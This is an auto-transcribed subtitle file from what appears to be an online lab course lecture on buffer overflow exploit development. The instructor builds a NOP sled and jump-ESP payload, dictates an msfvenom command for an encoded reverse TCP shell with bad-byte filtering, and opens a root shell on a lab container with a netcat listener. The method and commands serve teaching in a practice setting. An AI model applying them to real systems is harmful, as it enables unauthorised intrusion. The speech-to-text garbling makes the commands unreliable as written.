1
00:00:01,260 --> 00:00:01,540
All right.

2
00:00:01,569 --> 00:00:02,420
Are we recording?

3
00:00:02,430 --> 00:00:03,000
Good.

4
00:00:03,360 --> 00:00:03,750
All right.

5
00:00:03,750 --> 00:00:11,260
So welcome back to part four so we can prove that we actually landed in the buffer seas.

6
00:00:11,350 --> 00:00:11,720
Seas.

7
00:00:12,760 --> 00:00:16,530
Okay, so let's be a little bit clearer about our code.

8
00:00:17,220 --> 00:00:18,650
Let's go back to our host.

9
00:00:18,660 --> 00:00:19,950
I'm running parrots.

10
00:00:20,100 --> 00:00:22,590
It doesn't really matter like what you're running.

11
00:00:22,590 --> 00:00:26,340
It could be Linux, parrot, stuff like that.

12
00:00:27,390 --> 00:00:29,400
But we're going to generate our shell code.

13
00:00:29,400 --> 00:00:37,320
And I want to point out that in our previous 2019 class that we have the following bad bites that we

14
00:00:37,320 --> 00:00:38,280
identified.

15
00:00:38,580 --> 00:00:45,840
Once I finish with DEFCON Pro's versus Josep CES Las Vegas, I'm going to throw in the bad byte elimination

16
00:00:45,840 --> 00:00:46,410
section.

17
00:00:46,410 --> 00:00:48,090
I'm just kind of strapped for time.

18
00:00:49,050 --> 00:00:56,760
So our bad bytes that we identified previously was bad bytes.

19
00:00:57,680 --> 00:01:00,630
Hex there are nine.

20
00:01:01,380 --> 00:01:02,280
Hex zero.

21
00:01:02,280 --> 00:01:05,430
A hex

22
00:01:11,240 --> 00:01:12,870
x0a

23
00:01:14,670 --> 00:01:17,010
hex zero d.

24
00:01:20,290 --> 00:01:27,910
Hex 20 and hex to F and hex three f.

25
00:01:32,290 --> 00:01:33,040
Let me see.

26
00:01:36,740 --> 00:01:42,980
So let's clean up our exploit code a bit because we're actually very close to owning this box.

27
00:01:44,510 --> 00:01:46,940
So I want to create an op sled.

28
00:01:46,940 --> 00:01:50,320
So knops equals bytes.

29
00:01:50,330 --> 00:01:53,930
No operation times 16 knobs to be safe.

30
00:01:57,450 --> 00:01:59,700
And we're going to make a jump esp.

31
00:01:59,730 --> 00:02:05,670
So let's just rename it to jump ESP because we know we're going to land an extended stack pointer.

32
00:02:10,100 --> 00:02:14,840
We're going to remove this variable.

33
00:02:16,100 --> 00:02:19,430
We'll just call it filler or let's just call this filler.

34
00:02:25,260 --> 00:02:26,520
Call the Spiller.

35
00:02:27,600 --> 00:02:29,700
Call this job esp.

36
00:02:34,110 --> 00:02:35,850
And what else?

37
00:02:37,260 --> 00:02:40,940
We're going to generate our show code right now.

38
00:02:40,950 --> 00:02:47,310
Python or Metasploit actually generates shell code in Python three compatible format, so they pretend

39
00:02:47,310 --> 00:02:49,860
the byte specify or to it.

40
00:02:50,430 --> 00:02:54,080
So if we do this MSF that

41
00:02:57,000 --> 00:03:05,640
PHP Linux slash xa6 shell underscore verse underscore TCP host equals local

42
00:03:08,770 --> 00:03:17,160
oh four equals 4444-f python which specifies as python.

43
00:03:17,160 --> 00:03:18,960
And then we have our bad bytes.

44
00:03:18,960 --> 00:03:22,830
So it's going to be bad byte dash p

45
00:03:25,770 --> 00:03:28,790
hex or a hex zero oops

46
00:03:31,800 --> 00:03:39,480
090a0d

47
00:03:41,370 --> 00:03:42,150
20

48
00:03:44,040 --> 00:03:46,830
2f3f.

49
00:03:49,600 --> 00:03:54,730
And want to specify the platform as platform

50
00:03:56,230 --> 00:04:14,260
x-axa6 for 32 bit payload dash e for encoder xa6 shikata ga nai dash v shell code which outputs our

51
00:04:14,260 --> 00:04:19,390
python shell code in python compatible as a variable called shell code.

52
00:04:20,180 --> 00:04:21,459
This is going to take a minute.

53
00:04:42,100 --> 00:04:50,650
So notice how now Python generate show code in Python three compatible format so you can copy and paste

54
00:04:50,650 --> 00:04:55,900
all of this and then put inside of your IDE.

55
00:04:59,050 --> 00:05:01,120
And we have two additional variables.

56
00:05:01,300 --> 00:05:10,630
So what we're going to do is that we're going to change this to 4000 bytes, minus length overflow,

57
00:05:11,680 --> 00:05:16,840
minus ninth jump, ESP, minus length.

58
00:05:21,680 --> 00:05:22,580
Knops

59
00:05:25,670 --> 00:05:28,340
minus length show code.

60
00:05:34,420 --> 00:05:35,500
Let's see.

61
00:05:40,830 --> 00:05:41,250
Yes.

62
00:05:41,250 --> 00:05:42,900
That's going to be our filler.

63
00:05:43,350 --> 00:05:45,750
And now we're going to add our show code right here.

64
00:05:45,750 --> 00:05:52,830
So plus show code and hopefully this works since I'm in a bit of a rush.

65
00:05:54,790 --> 00:05:57,040
So let's copy and explain.

66
00:05:57,160 --> 00:05:59,320
Let's just run the script real quick.

67
00:06:05,100 --> 00:06:05,800
See.

68
00:06:06,720 --> 00:06:11,100
Go back to our container and I'll exploit pi.

69
00:06:16,410 --> 00:06:16,570
See?

70
00:06:16,650 --> 00:06:17,250
They told us.

71
00:06:24,630 --> 00:06:28,050
So we have our overflow heading to our job.

72
00:06:28,050 --> 00:06:29,880
Extend the stack pointer instruction.

73
00:06:29,880 --> 00:06:31,770
Oh, we forgot about it in ops.

74
00:06:31,770 --> 00:06:32,370
Sorry.

75
00:06:37,480 --> 00:06:37,840
No.

76
00:06:49,880 --> 00:06:51,860
Let's see, we overflowed.

77
00:06:51,860 --> 00:07:01,280
We retract to the ESP, we add a shield of 16, no operation commands to our shell code.

78
00:07:01,550 --> 00:07:11,600
And then we have our filler and our filler is a bunch of CS that basically subtracts the remainder of

79
00:07:11,600 --> 00:07:12,470
what's left.

80
00:07:14,540 --> 00:07:15,860
So this should work.

81
00:07:16,790 --> 00:07:18,350
So we're going to run it again.

82
00:07:18,350 --> 00:07:20,090
Running at 80.

83
00:07:22,130 --> 00:07:27,440
We're going to open another Windows Control B up, control B shift five.

84
00:07:28,010 --> 00:07:33,380
And then we will run net tab net cat in the LP four for four.

85
00:07:35,210 --> 00:07:38,920
This works python three exploit that py control.

86
00:07:38,930 --> 00:07:39,980
See the exit.

87
00:07:40,250 --> 00:07:41,660
We got our shell.

88
00:07:43,460 --> 00:07:47,030
So type ID, where am I?

89
00:07:48,590 --> 00:07:52,880
And we have a flag that I want you to submit as my quiz answer.

90
00:07:53,150 --> 00:07:54,290
I'll ask root.

91
00:07:55,460 --> 00:07:59,090
So, cat group flag text.

92
00:07:59,750 --> 00:08:01,210
This is your flag.

93
00:08:01,220 --> 00:08:03,800
This is the only freebie flag I'll ever give you.

94
00:08:05,060 --> 00:08:10,280
We will have a quiz for you to go through once you're done with this exercise.

95
00:08:10,640 --> 00:08:15,740
And at the end of this exercise on the Udemy class, you're expected to put in this flag.

96
00:08:16,520 --> 00:08:19,130
I don't expect you to do it any other way.

97
00:08:19,130 --> 00:08:24,110
But this is true that you can log in and count the flag, but you're kind of like cheating yourself.

98
00:08:24,110 --> 00:08:29,240
I want you to actually go through the entire exploit development process, so go ahead and submit this

99
00:08:29,240 --> 00:08:30,800
flag once I put up the question up.